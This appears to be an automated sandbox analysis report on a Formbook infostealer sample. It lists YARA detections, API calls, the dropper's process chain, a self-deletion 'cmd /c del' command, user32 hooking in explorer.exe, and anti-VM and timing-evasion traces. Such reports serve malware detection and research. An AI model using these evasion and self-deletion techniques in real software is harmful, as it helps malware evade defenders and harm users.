          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Code function: 0_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 2_2_0041A330 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 2_2_0041A3E0 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 2_2_0041A460 NtClose
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 2_2_0041A510 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 2_2_0041A32A NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 2_2_0041A3DB NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 2_2_0041A45A NtClose
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033996E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033996D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033999A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033995D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_0339A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_0339A770 NtOpenThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399760 NtOpenProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_0339A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033997A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399A20 NtResumeThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399A10 NtQuerySection
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_0339AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399560 NtWriteFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033995F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033999D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_03399820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_0339B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033998A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_033998F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_007DA330 NtCreateFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_007DA3E0 NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_007DA460 NtClose
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_007DA510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_007DA32A NtCreateFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_007DA3DB NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_007DA45A NtClose
          Source: O1ySvN9SvL.exe, Virustotal: Detection: 49%
          Source: O1ySvN9SvL.exe, ReversingLabs: Detection: 53%
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, File read: C:\Users\user\Desktop\O1ySvN9SvL.exe
          Source: O1ySvN9SvL.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Users\user\Desktop\O1ySvN9SvL.exe "C:\Users\user\Desktop\O1ySvN9SvL.exe"
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Process created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Process created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe"
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, File created: C:\Users\user\AppData\Local\Temp\nsr4D4D.tmp
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@9/4@2/1
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Code function: 0_2_00402078 CoCreateInstance,MultiByteToWideChar
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Code function: 0_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: netstat.pdbGCTL source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\bbzbv\zvllpn\ulml\6c213aee395f4218a983d22c1476bfe1\cpuiyl\nereonvn\Release\nereonvn.pdb source: O1ySvN9SvL.exe, 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp, O1ySvN9SvL.exe, 00000000.00000002.476520590.0000000002857000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000000.435751978.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000002.00000000.441820881.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, NETSTAT.EXE, 0000000A.00000002.719075583.000000000385F000.00000004.10000000.00040000.00000000.sdmp, zrztlh.exe.0.dr, nsr4D4E.tmp.0.dr
          Source: Binary string: netstat.pdb source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 1_2_00EAF225 push ecx; ret 1_2_00EAF238
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe Code function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DDA
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe File created: C:\Users\user\AppData\Local\Temp\zrztlh.exe (dropped file)

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000007C9904 second address: 00000000007C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000007C9B7E second address: 00000000007C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6876 Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7104 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_1-11669
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe API coverage: 9.5 %
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe API coverage: 3.4 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 9.8 %
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe Code function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405426
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe Code function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405D9C
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe Code function: 0_2_004026A1 FindFirstFileA,0_2_004026A1
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe API call chain: ExitProcess graph end node graph_0-3361
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe API call chain: ExitProcess graph end node graph_1-11670
          Source: explorer.exe, 00000003.00000000.475786546.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.512235091.0000000006915000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.497195090.0000000007F92000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 1_2_00EB57E5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00EB57E5
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe Code function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DDA
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 1_2_00EB6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00EB6AAA
